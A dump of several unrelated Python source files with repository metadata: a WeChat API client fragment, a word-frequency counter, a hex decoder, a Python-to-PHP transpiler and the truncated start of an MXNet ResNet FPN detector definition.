if toWxAccount is not None: msgDict['towxname'] = toWxAccount
r = requests.post('%s/cgi-bin/message/mass/preview?access_token=%s' %
(SERVER_URL, accessToken), data=encode_send_dict(msgDict))
def _wrap_result(result):
return ReturnValue(result.json())
r._wrap_result = _wrap_result
return r
@access_token
def form_video_id(mediaId, additionalDict, accessToken=None):
''' in theory video needs another method to get media_id for sending '''
additionalDict['media_id'] = mediaId
additionalDict['description'] = additionalDict['introduction']
# requests.packages.urllib3.disable_warnings()
url = 'https://file.api.weixin.qq.com/cgi-bin/media/uploadvideo' \
'?access_token=%s' % accessToken
r = requests.post(url, data=encode_send_dict(additionalDict))
# verify=False).json()
# I don't know why this is a fake ssl
def _wrap_result(result):
result = ReturnValue(result.json())
if 'media_id' in result:
result['errcode'] = 0
return result
r._wrap_result = _wrap_result
return r
def __form_send_dict(msgType, mediaId, additionalDict):
if not msgType in (IMAGE, VOICE, VIDEO, TEXT, NEWS, CARD):
return ReturnValue({'errcode': 40004,})
elif msgType == VIDEO:
mediaId = form_video_id(mediaId, additionalDict)['media_id']
if not mediaId: return mediaId
return {
NEWS: {'mpnews':{'media_id': mediaId}, 'msgtype': 'mpnews'},
TEXT: {'text': {'content': mediaId}, 'msgtype': 'text'},
VOICE: {'voice': {'media_id': mediaId}, 'msgtype': 'voice'},
IMAGE: {'image': {'media_id': mediaId}, 'msgtype': 'image'},
VIDEO: {'mpvideo':{'media_id': mediaId,
'title': additionalDict.get('title', ''),
'description': additionalDict.get('introduction', '')},
'msgtype': 'mpvideo'},
CARD: {'wxcard': {'card_id': mediaId}, 'msgtype': 'wxcard'},
}[msgType]
@access_token
def delete(msgId, accessToken=None):
r = requests.post('%s/cgi-bin/message/mass/delete?access_token=%s' %
(SERVER_URL, accessToken), data={'msg_id': msgId})
def _wrap_result(result):
return ReturnValue(result.json())
r._wrap_result = _wrap_result
return r
@access_token
def get(msgId, accessToken=None):
r = requests.post('%s/cgi-bin/message/mass/get?access_token=%s' %
(SERVER_URL, accessToken), data={'msg_id': int(msgId)})
def _wrap_result(result):
return ReturnValue(result.json())
r._wrap_result = _wrap_result
return r
@access_token
def upload(fileType, fileDir, additionalDict={}, permanent=False, accessToken=None):
if additionalDict: # format additionalDict
for key in ('description',):
if key in additionalDict and isinstance(additionalDict[key], dict):
for k, v in additionalDict[key].items():
if k not in additionalDict:
additionalDict[k] = v
additionalDict = {k.lower().replace('_', ''): v
for k, v in additionalDict.items()}
if 'introduction' in additionalDict:
additionalDict['description'] = additionalDict['introduction']
if not fileType in (IMAGE, VOICE, VIDEO, THUMB):
return ReturnValue({'errcode': 40004,})
elif fileType == VIDEO and permanent and not ('title' in additionalDict
and 'description' in additionalDict):
return ReturnValue({'errcode': -10003, 'errmsg':
'additionalDict for type VIDEO should be: ' +
"{'Title' : 'title', 'Description' :'des'}"})
try:
with open(fileDir, 'rb') as f:
file_ = f.read()
except:
return ReturnValue({'errcode': -10004,})
fileName = 'file' + os.path.splitext(fileDir)[1]
if hasattr(fileName, 'decode'):
fileName = fileName.decode('utf8', 'replace')
fileMime = mimetypes.guess_type(fileName)[0] or 'application/octet-stream'
if permanent:
url = '%s/cgi-bin/material/add_material?access_token=%s&type=%s'
else:
url = '%s/cgi-bin/media/upload?access_token=%s&type=%s'
files = {'media': (fileName, file_, fileMime), }
if fileType == VIDEO and permanent:
files['description'] = (None, encode_send_dict({
'title': additionalDict['title'],
'introduction': additionalDict['description'], }
), 'application/json')
r = requests.post(url % (SERVER_URL, accessToken, fileType),
files=files)
def _wrap_result(result):
result = ReturnValue(result.json())
if 'media_id' in result:
result['errcode'] = 0
else:
for k in result:
if 'media_id' in k:
result['media_id'] = result[k]
result['errcode'] = 0
break
return result
r._wrap_result = _wrap_result
return r
@access_token
def download(mediaId, accessToken=None):
r = requests.get('%s/cgi-bin/media/get?access_token=%s&media_id=%s' %
(SERVER_URL, accessToken, mediaId), stream=True)
def _wrap_result(result):
if 'text/plain' in result.headers['Content-Type']:
j = result.json()
if 'down_url' in j or 'news_item' in j:
j['errcode'] = 0
return ReturnValue(j)
else:
tempStorage = io.BytesIO()
for block in result.iter_content(1024):
tempStorage.write(block)
basicDict = {'File': tempStorage, 'errcode': 0}
if 'Content-disposition' in result.headers:
match = re.search('filename="(.*?)"', result.headers['Content-disposition'])
if match:
basicDict['FileName'] = match.group(1)
if 'Content-Type' in result.headers:
basicDict['ContentType'] = result.headers['Content-Type']
if 'Content-Length' in result.headers:
basicDict['ContentLength'] = result.headers['Content-Length']
return ReturnValue(basicDict)
r._wrap_result = _wrap_result
return r
@access_token
def get_material(mediaId, accessToken=None):
data = {'media_id': mediaId}
data = encode_send_dict(data)
if data is None: return ReturnValue({'errcode': -10001})
r = requests.post('%s/cgi-bin/material/get_material?access_token=%s' %
(SERVER_URL, accessToken), data=data, stream=True)
def _wrap_result(result):
if 'text/plain' in result.headers['Content-Type']:
j = result.json()
if 'down_url' in j or 'news_item' in j:
j['errcode'] = 0
return ReturnValue(j)
else:
tempStorage = io.BytesIO()
for block in result.iter_content(1024):
tempStorage.write(block)
basicDict = {'File': tempStorage, 'errcode': 0}
if 'Content-disposition' in result.headers:
match = re.search('filename="(.*?)"', result.headers['Content-disposition'])
if match:
basicDict['FileName'] = match.group(1)
if 'Content-Type' in result.headers:
basicDict['ContentType'] = result.headers['Content-Type']
if 'Content-Length' in result.headers:
basicDict['ContentLength'] = result.headers['Content-Length']
return ReturnValue(basicDict)
r._wrap_result = _wrap_result
return r
@access_token
def delete_material(mediaId, accessToken=None):
r = requests.post('%s/cgi-bin/material/del_material?access_token=%s' %
(SERVER_URL, accessToken), data={'msg_id': mediaId})
def _wrap_result(result):
return ReturnValue(result.json())
r._wrap_result = _wrap_result
return r
@access_token
def get_material_count(accessToken=None):
r = requests.get('%s/cgi-bin/material/get_materialcount?access_token=%s'
% (SERVER_URL, accessToken))
def _wrap_result(result):
result = ReturnValue(result.json())
if 'voice_count' in result:
result['errcode'] = 0
return result
r._wrap_result = _wrap_result
return r
@access_token
def batchget_material(fileType, offset=0, count=20, accessToken=None):
if not fileType in (IMAGE, VOICE, VIDEO, THUMB):
return ReturnValue({'errcode': 40004,})
if 20 < count: count = 20
data = {'type': fileType,
'offset': offset,
'count': count, }
data = encode_send_dict(data)
if data is None: return ReturnValue({'errcode': -10001})
r = requests.post('%s/cgi-bin/material/batchget_material?access_token=%s'
% (SERVER_URL, accessToken), data=data)
def _wrap_result(result):
result = ReturnValue(result.json())
if 'total_count' in result: result['errcode'] = 0
return result
r._wrap_result = _wrap_result
return r
@access_token
def create_news(newsDict, permanent=False, accessToken=None):
if permanent:
url = '%s/cgi-bin/material/add_news?access_token=%s'
else:
url = '%s/cgi-bin/media/uploadnews?access_token=%s'
r = requests.post(url % (SERVER_URL, accessToken),
data=encode_send_dict(newsDict))
def _wrap_result(result):
result = ReturnValue(result.json())
if 'media_id' in result: result['errcode'] = 0
return result
r._wrap_result = _wrap_result
return r
@access_token
def update_news(mediaId, newsDict, index=0, accessToken=None):
data = {
'media_id': mediaId,
'index': index,
'articles': newsDict, }
data = encode_send_dict(data)
if data is None: return ReturnValue({'errcode': -10001})
r = requests.post('%s/cgi-bin/material/update_news?access_token=%s' %
(SERVER_URL, accessToken), data=data)
def _wrap_result(result):
return ReturnValue(result.json())
r._wrap_result = _wrap_result
return r
@access_token
def get_image_url(openedFile, accessToken=None):
r = requests.post('%s/cgi-bin/media/uploadimg?access_token=%s' %
(SERVER_URL, accessToken), files={'file': openedFile})
def _wrap_result(result):
result = ReturnValue(result.json())
if 'url' in result: result['errcode'] = 0
return result
r._wrap_result = _wrap_result
return r
@access_token
def get_autoreply(accessToken=None):
r = requests.post('%s/cgi-bin/get_current_autoreply_info?access_token=%s' %
(SERVER_URL, accessToken))
def _wrap_result(result):
result = ReturnValue(result.json())
if 'is_autoreply_open' in result:
result['errcode'] = 0
return result
r._wrap_result = _wrap_result
return r
| [
"i7meavnktqegm1b@qq.com"
] | i7meavnktqegm1b@qq.com |
397af60380ffa4194bd09f7aacf8e1e1681c1190 | 34346885d1f3de258f5f38188f9abe82845a0776 | /countWords.py | d6f72a5de2d0b09d1ed7837479457625929364dd | [] | no_license | cscamman/CS-203-Final-Project | 5c031862d259685653187029e1bd108ec5cb69b1 | 338d4451cf5c5f89359da2bbcebf1858e7bf4b31 | refs/heads/master | 2021-01-01T06:03:04.954698 | 2017-07-15T21:18:24 | 2017-07-15T21:18:24 | 97,342,824 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,410 | py | """
Count Word Frequency
CSCI 203 project
Spring 2017
Student name(s): Corey Scamman
Justin LaCapra
"""
import operator
from collections import OrderedDict
from operator import itemgetter
def plotData(sorted_dic, string):
import matplotlib.pyplot as plt; plt.rcdefaults()
import numpy as np
import matplotlib.pyplot as plt
obj = (list(sorted_dic.keys()))
objects = (obj[0:20])
y_pos = np.arange(len(objects))
pref = list(sorted_dic.values())
counted = pref[0:20]
plt.barh(y_pos, counted, align='center', alpha= .5)
plt.yticks(y_pos, objects)
plt.ylabel('Frequency')
plt.title('Top 20 Used Words for ' + string )
plt.show()
def countWords(filename):
'''
takes in a txt file filename and returns the number of unique
words and also shows the 10 ten most used words and their count
'''
file = open(filename, 'r')
text1 = file.read()
text2 = text1.split() #text2 is list of words of SOU speech
stopwords = open('stopwords.txt', 'r')
stopwords1 = stopwords.read()
stopwords2 = stopwords1.split() #stopwords2 is list of stop words
#Eliminates all punctuation and turns all text into lowercase
for i in range(len(text2)):
text2[i] = text2[i].strip('-,.:;!?')
text2[i] = text2[i].lower()
#Eliminates the stop words from text2
noStopWordList = []
for i in text2:
if i not in stopwords2 and len(i)>2:
noStopWordList += [i]
uniqueWords = 0
dic = {}
#Tallies the frequency of each unique word
for i in range(len(noStopWordList)):
if noStopWordList[i] in noStopWordList:
if(noStopWordList[i] in dic):
dic[noStopWordList[i]] += 1
else:
dic[noStopWordList[i]] = 1
uniqueWords += 1
sorted_dic = sorted(dic.items(), key=lambda x:x[1],reverse=True)
print('Running analysis for ' + filename)
print('')
print('Unique words count: ' + str(uniqueWords))
print('Top 10 most used words and their count')
x = 1
y = 20
for i in range(y):
print(x,sorted_dic[x-1])
x += 1
plotData(OrderedDict(sorted_dic), filename)
file = (input('Please enter the name of the text file you would like to analyze\n'))
countWords(file)
| [
"noreply@github.com"
] | noreply@github.com |
ff7186b3ff427a7fdc001b27a0f1c83b3e5daf0a | 9d904e52e49df52739c3287454469d5831b01ab0 | /week2/convert_hex/main.py | ee8babace7a2e57761721c749118e7aa8bfec787 | [] | no_license | joeyabouharb/term2-challenges | dab54da02e9182d5633ec275667e07792934445b | 6b10296dcb187024df75d7620b01a1d848313c95 | refs/heads/master | 2023-01-25T05:10:09.106671 | 2019-10-22T23:56:53 | 2019-10-22T23:56:53 | 203,889,286 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 374 | py | #! /usr/bin/env python3
"""
Joseph Abouharb
decodes a secret message from hex value to text string
MIT
"""
from codecs import decode
x = 5
def main(hex_data):
print(
decode(hex_data, "hex").decode('utf-8')
)
if __name__ == '__main__':
main(
"49276d20616c7265616479205472616365"
)
print(x)
def test():
def fdfsdfsd():
pass | [
"joey.abouharb@gmail.com"
] | joey.abouharb@gmail.com |
419c8a91a20a69ff1f0924b178d71876b2f3d74b | 255e19ddc1bcde0d3d4fe70e01cec9bb724979c9 | /all-gists/1035975/snippet.py | 5f3993a8803fe9637f988459e7009fb87ae47a03 | [
"MIT"
] | permissive | gistable/gistable | 26c1e909928ec463026811f69b61619b62f14721 | 665d39a2bd82543d5196555f0801ef8fd4a3ee48 | refs/heads/master | 2023-02-17T21:33:55.558398 | 2023-02-11T18:20:10 | 2023-02-11T18:20:10 | 119,861,038 | 76 | 19 | null | 2020-07-26T03:14:55 | 2018-02-01T16:19:24 | Python | UTF-8 | Python | false | false | 13,415 | py | import ast
from cStringIO import StringIO
import sys
INFSTR = '1e308'
def interleave(inter, f, seq):
seq = iter(seq)
try:
f(next(seq))
except StopIteration:
pass
else:
for x in seq:
inter()
f(x)
class PythonToPhp:
def __init__(self, source, indent = 0):
tree = ast.parse(source)
self.code = StringIO()
self.tabstop = 2
self._indent = indent
self.dispatch(tree)
def get_code(self):
return self.code.getvalue()
def fill(self, text = ''):
self.code.write('\n%s%s' % (' ' * self.tabstop * self._indent, text))
def write(self, text):
self.code.write(text)
def enter(self):
self.code.write(' {')
self._indent += 1
def leave(self):
self._indent -= 1
self.fill('}')
def error(self, msg):
print msg
sys.exit()
def dispatch(self, tree):
if isinstance(tree, list):
for t in tree:
self.dispatch(t)
return
meth = getattr(self, '_%s' % tree.__class__.__name__)
return meth(tree)
########## Transform Methods ##########
def _Module(self, tree):
for stmt in tree.body:
self.dispatch(stmt)
### Statement ###
def _Expr(self, tree):
self.fill()
self.dispatch(tree.value)
self.write(';')
def _Import(self, t):
self.error('import not supported')
def _ImportFrom(self, t):
self.error('import not supported')
def _Assign(self, t):
self.fill()
for target in t.targets:
if isinstance(target, ast.Tuple):
self._lvalue_tuple(target)
else:
self.dispatch(target)
self.write(' = ')
self.dispatch(t.value)
self.write(';')
def _AugAssign(self, t):
self.fill()
self.dispatch(t.target)
name = t.op.__class__.__name__
if name == 'Pow':
self.write(' = pow(')
self.dispatch(t.target)
self.write(', ')
self.dispatch(t.value)
self.write(');')
elif name == 'FloorDiv':
self.write(' = floor(')
self.dispatch(t.target)
self.write(' / ')
self.dispatch(t.value)
self.write(');')
else:
self.write(' %s= ' % self.binop[t.op.__class__.__name__])
self.dispatch(t.value)
self.write(';')
def _Return(self, t):
self.fill('return')
if t.value:
self.write(' ')
self.dispatch(t.value)
self.write(';')
def _Pass(self, t):
self.fill(';')
def _Break(self, t):
self.fill('break;')
def _Continue(self, t):
self.fill('continue;')
def _Delete(self, t):
for target in t.targets:
self.fill('unset(')
self.dispatch(target)
self.write(');')
def _Assert(self, t):
self.fill('assert(')
self.dispatch(t.test)
self.write(');')
def _Exec(self, t):
self.fill('eval(')
self.dispatch(t.body)
self.write(');')
def _Print(self, t):
self.fill('echo ')
sep = ''
for e in t.values:
self.write(sep)
self.dispatch(e)
sep = ', '
if t.nl:
self.write(sep)
self.write("'<br />'")
self.write(';')
def _Global(self, t):
self.fill('global ')
interleave(lambda: self.write(', '), self.write, t.names)
self.write(';')
def _Yield(self, t):
self.error('yield not supported')
def _Raise(self, t):
self.error('Exceptions not supported')
def _TryExcept(self, t):
self.error('Exceptions not supported')
def _TryFinally(self, t):
self.error('Exceptions not supported')
def _ExceptHandler(self, t):
self.error('Exceptions not supported')
def _ClassDef(self, t):
self.error('Class not supported')
def _FunctionDef(self, t):
self.fill('function ' + t.name + '(')
self.dispatch(t.args)
self.write(')')
self.enter()
self.dispatch(t.body)
self.leave()
def _For(self, t):
self.fill('foreach (')
self.dispatch(t.iter)
self.write(' as ')
self.dispatch(t.target)
self.write(')')
self.enter()
self.dispatch(t.body)
self.leave()
if t.orelse:
self.error('else clause for for statement not supported')
def _If(self, t):
self.fill("if (")
self.dispatch(t.test)
self.write(')')
self.enter()
self.dispatch(t.body)
self.leave()
# collapse nested ifs into equivalent elifs.
while (t.orelse and len(t.orelse) == 1 and
isinstance(t.orelse[0], ast.If)):
t = t.orelse[0]
self.fill("elseif (")
self.dispatch(t.test)
self.write(')')
self.enter()
self.dispatch(t.body)
self.leave()
# final else
if t.orelse:
self.fill("else")
self.enter()
self.dispatch(t.orelse)
self.leave()
def _While(self, t):
self.fill("while (")
self.dispatch(t.test)
self.write(')')
self.enter()
self.dispatch(t.body)
self.leave()
if t.orelse:
self.error('else clause for while statement not supported')
def _With(self, t):
self.error('with statement not supported')
### Expression ###
def _Str(self, t):
self.write(repr(t.s))
def _Name(self, t):
if t.id == 'True':
self.write('true')
elif t.id == 'False':
self.write('false')
elif t.id == 'None':
self.write('null')
else:
self.write('$%s' % t.id)
def _Repr(self, t):
self.write('var_export(')
self.dispatch(t.value)
self.write(", true)")
def _Num(self, t):
repr_n = repr(t.n)
if repr_n.startswith('-'):
self.write('(')
self.write(repr_n.replace('inf', INFSTR))
if repr_n.startswith('-'):
self.write(')')
def _List(self, t):
self.write('array(')
interleave(lambda: self.write(", "), self.dispatch, t.elts)
self.write(')')
def _ListComp(self, t):
if len(t.generators) > 1:
self.error('multiple generators in comprehension not supported')
generator = t.generators.pop()
self._comprehension(generator, 'left')
self.dispatch(t.elt)
self._comprehension(generator, 'right')
def _comprehension(self, t, part = 'left'):
if part == 'left':
if t.ifs:
self.write('array_filter(array_map(function(')
else:
self.write('array_map(function(')
self.dispatch(t.target)
self.write(') { return ')
elif part == 'right':
self.write('; }, ')
self.dispatch(t.iter)
if t.ifs:
self.write('), function(')
self.dispatch(t.target)
self.write(') { return ')
for if_clause in t.ifs:
self.dispatch(if_clause)
self.write('; })')
else:
self.write(')')
def _GeneratorExp(self, t):
if len(t.generators) > 1:
self.error('multiple generators in comprehension not supported')
generator = t.generators.pop()
self._comprehension(generator, 'left')
self.dispatch(t.elt)
self._comprehension(generator, 'right')
def _SetComp(self, t):
if len(t.generators) > 1:
self.error('multiple generators in comprehension not supported')
self.write('array_unique(')
generator = t.generators.pop()
self._comprehension(generator, 'left')
self.dispatch(t.elt)
self._comprehension(generator, 'right')
self.write(')')
def _DictComp(self, t):
self.error('dict comprehension not supported')
def _IfExp(self, t):
self.write("((")
self.dispatch(t.test)
self.write(') ? (')
self.dispatch(t.body)
self.write(') : (')
self.dispatch(t.orelse)
self.write('))')
def _Set(self, t):
assert(t.elts) # should be at least one element
self.write('array_unique(array(')
interleave(lambda: self.write(", "), self.dispatch, t.elts)
self.write('))')
def _Dict(self, t):
self.write('array(')
def write_pair(pair):
k, v = pair
self.dispatch(k)
self.write(' => ')
self.dispatch(v)
interleave(lambda: self.write(', '), write_pair, zip(t.keys, t.values))
self.write(')')
def _Tuple(self, t):
self.write('array(')
interleave(lambda: self.write(", "), self.dispatch, t.elts)
self.write(')')
def _lvalue_tuple(self, t):
self.write('list(')
interleave(lambda: self.write(", "), self.dispatch, t.elts)
self.write(')')
unop = {"Invert":"~", "Not": "!", "UAdd":"+", "USub":"-"}
def _UnaryOp(self, t):
self.write("(")
self.write(self.unop[t.op.__class__.__name__])
self.write(" ")
if isinstance(t.op, ast.USub) and isinstance(t.operand, ast.Num):
self.write("(")
self.dispatch(t.operand)
self.write(")")
else:
self.dispatch(t.operand)
self.write(")")
binop = {
"Add":"+",
"Sub":"-",
"Mult":"*",
"Div":"/",
"Mod":"%",
"LShift":"<<",
"RShift":">>",
"BitOr":"|",
"BitXor":"^",
"BitAnd":"&",
}
def _BinOp(self, t):
name = t.op.__class__.__name__
if name == 'Pow':
self.write("(pow(")
self.dispatch(t.left)
self.write(', ')
self.dispatch(t.right)
self.write('))')
elif name == 'FloorDiv':
self.write('(floor(')
self.dispatch(t.left)
self.write(' / ')
self.dispatch(t.right)
self.write('))')
elif name == 'Mod' and isinstance(t.left, ast.Str):
self.write('sprintf(')
self.dispatch(t.left)
self.write(', ')
if isinstance(t.right, ast.Str):
self.dispatch(t.right)
elif isinstance(t.right, ast.Tuple):
interleave(lambda: self.write(", "), self.dispatch, t.right.elts)
else:
self.error('impossible string substript error')
self.write(')')
else:
self.write("(")
self.dispatch(t.left)
self.write(" " + self.binop[name] + " ")
self.dispatch(t.right)
self.write(")")
cmpops = {
"Eq":"==",
"NotEq":"!=",
"Lt":"<",
"LtE":"<=",
"Gt":">",
"GtE":">=",
"Is":"===",
"IsNot":"!==",
}
def _Compare(self, t):
name = t.ops[0].__class__.__name__
self.write("(")
if name == 'In':
comparator = t.comparators.pop()
self.write('in_array(')
self.dispatch(t.left)
self.write(', ')
self.dispatch(comparator)
self.write(') || array_key_exists(')
self.dispatch(t.left)
self.write(', ')
self.dispatch(comparator)
self.write(')')
elif name == 'NotIn':
comparator = t.comparators.pop()
self.write('!in_array(')
self.dispatch(t.left)
self.write(', ')
self.dispatch(comparator)
self.write(') && !array_key_exists(')
self.dispatch(t.left)
self.write(', ')
self.dispatch(comparator)
self.write(')')
else:
self.dispatch(t.left)
for o, e in zip(t.ops, t.comparators):
self.write(" " + self.cmpops[o.__class__.__name__] + " ")
self.dispatch(e)
self.write(")")
boolops = {ast.And: '&&', ast.Or: '||'}
def _BoolOp(self, t):
self.write("(")
s = " %s " % self.boolops[t.op.__class__]
interleave(lambda: self.write(s), self.dispatch, t.values)
self.write(")")
def _Attribute(self,t):
self.dispatch(t.value)
self.write("->")
self.write(t.attr)
def _func_name(self, t):
self.write('%s' % t.id)
def _Call(self, t):
self._func_name(t.func)
self.write("(")
comma = False
for e in t.args:
if comma: self.write(", ")
else: comma = True
self.dispatch(e)
for e in t.keywords:
if comma: self.write(", ")
else: comma = True
self.dispatch(e)
if t.starargs:
self.error('function vararg not supported')
if t.kwargs:
self.error('function kwarg not supported')
self.write(")")
def _Subscript(self, t):
if isinstance(t.slice, ast.Index):
#self.dispatch(t.value)
#self.write("[")
#self.dispatch(t.slice)
#self.write("]")
self.write('pyphp_subscript(')
self.dispatch(t.value)
self.write(', ')
self.dispatch(t.slice)
self.write(')')
elif isinstance(t.slice, ast.Slice):
self.write('array_slice(')
self.dispatch(t.value)
self.write(', ')
self.dispatch(t.slice)
self.write(')')
def _Ellipsis(self, t):
self.error('ellipsis not supported')
def _Index(self, t):
self.dispatch(t.value)
def _Slice(self, t):
if t.lower:
self.dispatch(t.lower)
else:
self.write('0')
if t.upper:
self.write(", ")
self.write('(')
self.dispatch(t.upper)
self.write(' - ')
if t.lower:
self.dispatch(t.lower)
else:
self.write('0')
self.write(')')
if t.step:
self.error('slice step not supported')
def _ExtSlice(self, t):
self.error('extslice not supported')
#interleave(lambda: self.write(', '), self.dispatch, t.dims)
### Others ###
def _arguments(self, t):
first = True
defaults = [None] * (len(t.args) - len(t.defaults)) + t.defaults
for a,d in zip(t.args, defaults):
if first: first = False
else: self.write(", ")
self.dispatch(a),
if d:
self.write(" = ")
self.dispatch(d)
if t.vararg:
self.error('function vararg not supported')
if t.kwarg:
self.error('function kwarg not supported')
def _keyword(self, t):
self.write('$%s' % t.arg)
self.write(" = ")
self.dispatch(t.value)
def _Lambda(self, t):
self.write("(")
self.write("function(")
self.dispatch(t.args)
self.write(") {")
self.dispatch(t.body)
self.write("})")
def _alias(self, t):
self.error('alias not supported')
| [
"gistshub@gmail.com"
] | gistshub@gmail.com |
ce9503d82749c331998242ffc827e8f6aa81c3bb | 1a8583a07b710a2b8d3344bddb3aa5dd2abc9547 | /fpn/symbols/resnet_v1_101_fpn_rcnn_sod_l0_focal_v4.py | d103e0f2366990e847198ebfde760930a3092875 | [
"MIT"
] | permissive | qilei123/sod_v1_demo | 9fec1377609acaa2c04ced0008208ecabce3f53e | a38f76e5a3af13f8f16d32aa40369f1a4f4fd839 | refs/heads/master | 2020-05-04T18:27:50.655652 | 2019-07-02T01:39:58 | 2019-07-02T01:39:58 | 179,354,251 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 92,739 | py | # --------------------------------------------------------
# Deformable Convolutional Networks
# Copyright (c) 2017 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Haozhi Qi
# --------------------------------------------------------
import cPickle
import mxnet as mx
from utils.symbol import Symbol
from operator_py.pyramid_proposal import *
from operator_py.proposal_target import *
from operator_py.fpn_roi_pooling import *
from operator_py.box_annotator_ohem import *
from operator_py.focal_loss_OptimizedVersion import *
class resnet_v1_101_fpn_rcnn_sod_l0_focal_v4(Symbol):
def __init__(self):
"""
Use __init__ to define parameter network needs
"""
self.shared_param_list = ['rpn_conv', 'rpn_cls_score', 'rpn_bbox_pred']
self.shared_param_dict = {}
for name in self.shared_param_list:
self.shared_param_dict[name + '_weight'] = mx.sym.Variable(name + '_weight')
self.shared_param_dict[name + '_bias'] = mx.sym.Variable(name + '_bias')
def get_resnet_backbone(self, data, with_dilated=False, with_dconv=False, with_dpyramid=False, eps=1e-5):
conv1 = mx.symbol.Convolution(name='conv1', data=data, num_filter=64, pad=(3, 3), kernel=(7, 7), stride=(2, 2), no_bias=True)
bn_conv1 = mx.symbol.BatchNorm(name='bn_conv1', data=conv1, use_global_stats=True, fix_gamma=False, eps=eps)
scale_conv1 = bn_conv1
conv1_relu = mx.symbol.Activation(name='conv1_relu', data=scale_conv1, act_type='relu')
pool1 = mx.symbol.Pooling(name='pool1', data=conv1_relu, pooling_convention='full', pad=(0, 0), kernel=(3, 3), stride=(2, 2), pool_type='max')
res2a_branch1 = mx.symbol.Convolution(name='res2a_branch1', data=pool1, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn2a_branch1 = mx.symbol.BatchNorm(name='bn2a_branch1', data=res2a_branch1, use_global_stats=True, fix_gamma=False, eps=eps)
scale2a_branch1 = bn2a_branch1
res2a_branch2a = mx.symbol.Convolution(name='res2a_branch2a', data=pool1, num_filter=64, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn2a_branch2a = mx.symbol.BatchNorm(name='bn2a_branch2a', data=res2a_branch2a, use_global_stats=True, fix_gamma=False, eps=eps)
scale2a_branch2a = bn2a_branch2a
res2a_branch2a_relu = mx.symbol.Activation(name='res2a_branch2a_relu', data=scale2a_branch2a, act_type='relu')
res2a_branch2b = mx.symbol.Convolution(name='res2a_branch2b', data=res2a_branch2a_relu, num_filter=64, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn2a_branch2b = mx.symbol.BatchNorm(name='bn2a_branch2b', data=res2a_branch2b, use_global_stats=True, fix_gamma=False, eps=eps)
scale2a_branch2b = bn2a_branch2b
res2a_branch2b_relu = mx.symbol.Activation(name='res2a_branch2b_relu', data=scale2a_branch2b, act_type='relu')
res2a_branch2c = mx.symbol.Convolution(name='res2a_branch2c', data=res2a_branch2b_relu, num_filter=256,
pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn2a_branch2c = mx.symbol.BatchNorm(name='bn2a_branch2c', data=res2a_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale2a_branch2c = bn2a_branch2c
res2a = mx.symbol.broadcast_add(name='res2a', *[scale2a_branch1, scale2a_branch2c])
res2a_relu = mx.symbol.Activation(name='res2a_relu', data=res2a, act_type='relu')
res2b_branch2a = mx.symbol.Convolution(name='res2b_branch2a', data=res2a_relu, num_filter=64, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn2b_branch2a = mx.symbol.BatchNorm(name='bn2b_branch2a', data=res2b_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale2b_branch2a = bn2b_branch2a
res2b_branch2a_relu = mx.symbol.Activation(name='res2b_branch2a_relu', data=scale2b_branch2a, act_type='relu')
res2b_branch2b = mx.symbol.Convolution(name='res2b_branch2b', data=res2b_branch2a_relu, num_filter=64,
pad=(1, 1),
kernel=(3, 3), stride=(1, 1), no_bias=True)
bn2b_branch2b = mx.symbol.BatchNorm(name='bn2b_branch2b', data=res2b_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale2b_branch2b = bn2b_branch2b
res2b_branch2b_relu = mx.symbol.Activation(name='res2b_branch2b_relu', data=scale2b_branch2b, act_type='relu')
res2b_branch2c = mx.symbol.Convolution(name='res2b_branch2c', data=res2b_branch2b_relu, num_filter=256,
pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn2b_branch2c = mx.symbol.BatchNorm(name='bn2b_branch2c', data=res2b_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale2b_branch2c = bn2b_branch2c
res2b = mx.symbol.broadcast_add(name='res2b', *[res2a_relu, scale2b_branch2c])
res2b_relu = mx.symbol.Activation(name='res2b_relu', data=res2b, act_type='relu')
res2c_branch2a = mx.symbol.Convolution(name='res2c_branch2a', data=res2b_relu, num_filter=64, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn2c_branch2a = mx.symbol.BatchNorm(name='bn2c_branch2a', data=res2c_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale2c_branch2a = bn2c_branch2a
res2c_branch2a_relu = mx.symbol.Activation(name='res2c_branch2a_relu', data=scale2c_branch2a, act_type='relu')
res2c_branch2b = mx.symbol.Convolution(name='res2c_branch2b', data=res2c_branch2a_relu, num_filter=64,
pad=(1, 1),
kernel=(3, 3), stride=(1, 1), no_bias=True)
bn2c_branch2b = mx.symbol.BatchNorm(name='bn2c_branch2b', data=res2c_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale2c_branch2b = bn2c_branch2b
res2c_branch2b_relu = mx.symbol.Activation(name='res2c_branch2b_relu', data=scale2c_branch2b, act_type='relu')
res2c_branch2c = mx.symbol.Convolution(name='res2c_branch2c', data=res2c_branch2b_relu, num_filter=256,
pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn2c_branch2c = mx.symbol.BatchNorm(name='bn2c_branch2c', data=res2c_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale2c_branch2c = bn2c_branch2c
res2c = mx.symbol.broadcast_add(name='res2c', *[res2b_relu, scale2c_branch2c])
res2c_relu = mx.symbol.Activation(name='res2c_relu', data=res2c, act_type='relu')
res3a_branch1 = mx.symbol.Convolution(name='res3a_branch1', data=res2c_relu, num_filter=512, pad=(0, 0),
kernel=(1, 1), stride=(2, 2), no_bias=True)
bn3a_branch1 = mx.symbol.BatchNorm(name='bn3a_branch1', data=res3a_branch1, use_global_stats=True,
fix_gamma=False, eps=eps)
scale3a_branch1 = bn3a_branch1
res3a_branch2a = mx.symbol.Convolution(name='res3a_branch2a', data=res2c_relu, num_filter=128, pad=(0, 0),
